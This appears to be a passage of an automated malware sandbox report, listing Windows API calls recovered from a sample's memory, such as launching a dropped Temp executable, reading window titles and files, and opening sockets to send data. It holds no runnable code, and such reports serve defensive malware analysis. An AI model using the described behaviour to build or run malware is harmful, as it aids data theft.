                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4250438611-0
                                                                                                                                                                                                                                                      • Opcode ID: 294893e2361b1ba13b3bbcb390845a27b485d236ad8f25031e62fff4223f08ce
                                                                                                                                                                                                                                                      • Instruction ID: c9d6b92abd626ca5db185230e959bef37719a4ae52968149ec7b4f218e17ecc5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 294893e2361b1ba13b3bbcb390845a27b485d236ad8f25031e62fff4223f08ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 590161708047809AEF30AB30D6444ABBB909F113507498D5FD4E6E26D1D79DACE89B5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,76AE8A60,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140DE
                                                                                                                                                                                                                                                      • SHGetPathFromIDListA.SHELL32(?,?,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140E8
                                                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 004140F2
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0,?,?,0041080C,00000026,?,?,00000000,?), ref: 00414113
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FolderFromListLocationMallocPathSpeciallstrcat
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 184925564-0
                                                                                                                                                                                                                                                      • Opcode ID: c5650b9585e189a1aad39bfab654fba963a07972d6129a42c432e7bc8104cf66
                                                                                                                                                                                                                                                      • Instruction ID: 4893c9fcd2a20e39af297159af48713977b3e8e57404a87c3b1fccec64a73e85
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5650b9585e189a1aad39bfab654fba963a07972d6129a42c432e7bc8104cf66
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0F0E275600219FFCB109F94DC08A9A7BA8EF09315F1080A4FD05D7250D675AA12CBA6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C14
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00413E9A,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C1D
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocateSleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3409823521-0
                                                                                                                                                                                                                                                      • Opcode ID: dc8d79010e6cb7fb2a9b52c8fd9bd5d07f5d98b887a2c5e385c4889fd42eb09a
                                                                                                                                                                                                                                                      • Instruction ID: 01a82105be4d9c68f9512b8fa3753ec40f4bf94fe3f1a858fa601996ad67c288
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc8d79010e6cb7fb2a9b52c8fd9bd5d07f5d98b887a2c5e385c4889fd42eb09a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7E0D83274121877C020279BAD45F5BF75CDFD5BA4F414022F704971509AA6686286FA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040C472: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 0040C4B4
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000,00000000,00000001), ref: 0040D06C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0040D080
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe, xrefs: 0040D065
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExecuteMutexOpenShellSleep
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 3313497417-2091069259
                                                                                                                                                                                                                                                      • Opcode ID: 117c280adc1b803f575a3237ff7414ec7e63fe4d44f94df6fb0d4f2777152324
                                                                                                                                                                                                                                                      • Instruction ID: 3e9c2417071d30d14c851cbdd2542e738391786d2d5ab44393d6f6cb1bd2832f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 117c280adc1b803f575a3237ff7414ec7e63fe4d44f94df6fb0d4f2777152324
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59F0AF61AC1214A9FE2067F09C92FF713080B1231EF14013BBD84B60C3CAAD0C4ED26D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00415701
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00000078), ref: 00415711
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: SleepTextWindow
                                                                                                                                                                                                                                                      • String ID: Twitter
                                                                                                                                                                                                                                                      • API String ID: 1325625986-3654763050
                                                                                                                                                                                                                                                      • Opcode ID: 064e06eff7cba56788296dd554277bd5bcdb24fe66745113e8d5994929ac3a61
                                                                                                                                                                                                                                                      • Instruction ID: 2a0e3f0a641bcea6516841aa513571c01fddd2f65c57e64924d831f9732283cf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 064e06eff7cba56788296dd554277bd5bcdb24fe66745113e8d5994929ac3a61
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DF02271A04114EFDB10DB60D84AEEA7BA8FF04304F50806BF815C72D1EB38E885C759
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76AE83C0,00000000), ref: 00410393
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004103A9
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004103B2
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleHeap$AllocateProcessReadSizelstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3521016810-0
                                                                                                                                                                                                                                                      • Opcode ID: e87de52dd8e88f286967c1eff207711887f7482a07c82e20ed90b173d74b53ad
                                                                                                                                                                                                                                                      • Instruction ID: 5bf679c8028eb031669f3285946201917d3a701bc05667cd36c703c6161c815c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e87de52dd8e88f286967c1eff207711887f7482a07c82e20ed90b173d74b53ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70212572500208BFDB20AF65DC85EEB7B68EF41364F10042AF950E7180EBB89AD0CB65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00414E03: socket.WS2_32(00000002,00000001,00000006), ref: 00414E1A
                                                                                                                                                                                                                                                        • Part of subcall function 00414E03: ioctlsocket.WS2_32(00000000,8004667E,76AF23A0), ref: 00414E2D
                                                                                                                                                                                                                                                        • Part of subcall function 00414E03: htons.WS2_32(?), ref: 00414E3C
                                                                                                                                                                                                                                                        • Part of subcall function 00414E03: connect.WS2_32(00000000,00000002,00000010), ref: 00414E53
                                                                                                                                                                                                                                                        • Part of subcall function 00414E03: WSAGetLastError.WS2_32(?,?,00000000), ref: 00414E62
                                                                                                                                                                                                                                                        • Part of subcall function 00414E03: select.WS2_32(00000000,00000000,?,?,?), ref: 00414EA6
                                                                                                                                                                                                                                                        • Part of subcall function 00414E03: __WSAFDIsSet.WS2_32(00000000,?), ref: 00414EB8
                                                                                                                                                                                                                                                        • Part of subcall function 00414E03: ioctlsocket.WS2_32(00000000,8004667E,76AF23A0), ref: 00414ECA
                                                                                                                                                                                                                                                      • send.WS2_32(00000000,?,0000000A,00000000), ref: 004024AF
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,76AF23A0,?,?,004132DF,00003EE0,00003EE0), ref: 004024BA
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 004024E5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ioctlsocket$ErrorLastSleepclosesocketconnecthtonsselectsendsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2050872176-0
                                                                                                                                                                                                                                                      • Opcode ID: 594b18c2408706cde238c60673fabe3dde89ddc923651aed0ec5ce55a4ff25a5
                                                                                                                                                                                                                                                      • Instruction ID: ec0fecb526b010ebb54ffab285d2fd429f80eeafa325eacc7e4220b2904c4743
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 594b18c2408706cde238c60673fabe3dde89ddc923651aed0ec5ce55a4ff25a5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1201D632644218BFEF216B94DD46DEF3B6CEB09354F000036FE04B51D1E67A5E5687AA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(0040C791,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,76AE83C0,76AE8A60,?,0040C791,00000000), ref: 00401E78
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,0040C791,00000000,?,00000000,76AE83C0,76AE8A60,?,0040C791,00000000), ref: 00401E8E
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,76AE83C0,76AE8A60,?,0040C791,00000000), ref: 00401E97
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$ReadSize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 544545239-0
                                                                                                                                                                                                                                                      • Opcode ID: e69d7c9796f7011418dbdc12bb5b1820b9feb26d2d6a72cc67a0287690586167
                                                                                                                                                                                                                                                      • Instruction ID: 70d0acc40c6bbc286e2840f8266f4b633dd67f2653dc02f1a20cf65559c156c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e69d7c9796f7011418dbdc12bb5b1820b9feb26d2d6a72cc67a0287690586167
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A0126719042087BDB212BA59C89EFF3F6CDF423A8F10016AF901720D1DA7D0A5686A9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,76AF23A0), ref: 004015F4
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040160B
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401612
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
